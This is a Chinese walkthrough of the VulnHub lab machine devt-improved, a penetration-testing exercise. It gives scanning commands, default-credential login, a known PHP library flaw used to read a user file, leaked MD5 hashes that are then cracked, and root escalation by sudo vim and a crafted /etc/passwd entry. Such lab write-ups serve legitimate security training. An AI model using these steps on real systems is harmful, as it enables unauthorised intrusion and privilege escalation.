本周实践的是vulnhub的devt-improved镜像,
下载地址,https://download.vulnhub.com/digitalworld/devt-improved.7z,
用workstation导入成功,
做地址扫描,sudo netdiscover -r 192.168.131.0/24,
获取到靶机地址是192.168.131.139,
继续做端口扫描,sudo nmap -sS -sV -T5 -A -p- 192.168.131.139,
浏览器访问http://192.168.131.139:8080,获取到html_pages,
浏览器访问http://192.168.131.139:8080/html_pages,
在页面源码中获取到developmentsecretpage,
浏览器访问http://192.168.131.139:8080/developmentsecretpage,
用admin/1234登录成功,获取到slogin_lib.inc.php,
在网上搜到漏洞利用方法,slog_users.txt,
浏览器访问http://192.168.131.139:8080/developmentsecretpage/slog_users.txt,
获取到patrick, 87e6d56ce79af90dbe07d387d3d0579e,
还有intern, 4a8a2b374f463b7aedbb44a066363b81,
在线md5破解,获取到12345678900987654321,
切到bash,echo os.system('/bin/bash'),
查看root权限程序,sudo -l,获取到/usr/bin/vim,
准备一套root权限的用户名密码,写入/etc/passwd,
hacker:sa3tHJ3/KuYvI:0:0:hacker:/root:/bin/bash,
切到hacker用户,su hacker,id确认是root,
原文始发于微信公众号(云计算和网络安全技术实践):vulnhub之devt-improved的实践
评论